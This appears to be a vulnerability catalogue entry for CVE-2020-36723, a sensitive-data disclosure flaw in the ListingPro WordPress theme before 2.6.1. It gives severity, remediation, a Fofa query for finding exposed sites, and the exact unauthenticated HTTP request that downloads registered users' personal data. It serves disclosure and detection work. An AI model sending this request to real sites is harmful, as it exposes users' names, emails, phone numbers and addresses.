| Title | ListingPro < 2.6.1 - Sensitive Data Disclosure |
|---|---|
| Author | ritikchaddha |
| Severity | High |
| Impact | Unauthenticated attackers can extract sensitive user data including usernames, email addresses, phone numbers, and physical addresses from all registered users. |
| Remediation | Upgrade to ListingPro version 2.6.1 or later. |
| CVSS Score | 5.3 |
| EPSS Score | 0.14607 |
| CVE ID | CVE-2020-36723 |
| CWE ID | CWE-200 |
| Fofa Query | body="/wp-content/plugins/listingpro" |
| Tags | cve cve2020 wordpress wp-plugin wp exposure listingpro vuln vkev |
The ListingPro - WordPress Directory & Listing Theme for WordPress is vulnerable to Sensitive Data Exposure in versions before 2.6.1 via the ~/listingpro-plugin/functions.php file. This makes it possible for unauthenticated attackers to extract sensitive data including usernames, full names, email addresses, phone numbers, physical addresses and user post counts.
GET /wp-admin/index.php?download-lp-users=yes HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.5.20) Gecko/ Firefox/3.6.6
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-36723.yaml
🦈 Packet Capture: ⬇️ Download cve-2020-36723.pcap
N/AN/A